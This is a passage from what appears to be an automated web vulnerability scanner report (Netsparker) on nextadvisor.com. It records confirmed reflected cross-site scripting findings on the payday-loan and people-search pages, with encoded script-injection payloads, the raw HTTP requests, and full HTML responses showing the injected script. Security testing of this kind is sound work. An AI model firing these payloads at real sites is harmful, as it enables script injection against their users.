Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831..
- /payday_loans/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00030F)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00030F)%3C/script%3E

/payday_loans/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00030F)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00030F)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/payday_loans/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x00030F)</script>

Request

GET /payday_loans/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00030F)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/payday_loans/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:58:47 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6768
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", payday lender, loans, united states, CashNet USA, Cash Central, PayDayOne, Speedy Cash, Check 'n Go, MyPayDayLoan, PayDayMax" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/payday_loans/'"--></style></script><script>netsparker(0x00030F)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x00030F)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/payday_loans_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Payday Loan Reviews FAQ</h1> <p>Frequently Asked Questions about Payday Loan Reviews</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Payday Loan Reviews:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="payday_loans"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog2..
- /people_search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000310)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000310)%3C/script%3E

/people_search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000310)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000310)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/people_search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000310)</script>

Request

GET /people_search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000310)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/people_search/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:58:48 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6557
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", people search, people searches, background checks, people finder, Intelius, Net Detective, Exploreos, IntegraScan, US Search, PeopleFinders" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/people_search/'"--></style></script><script>netsparker(0x000310)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000310)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/people_search_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> People Search and Background Checks FAQ</h1> <p>Frequently Asked Questions about People Search and Background Checks</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about People Search and Background Checks:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="people_search"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-b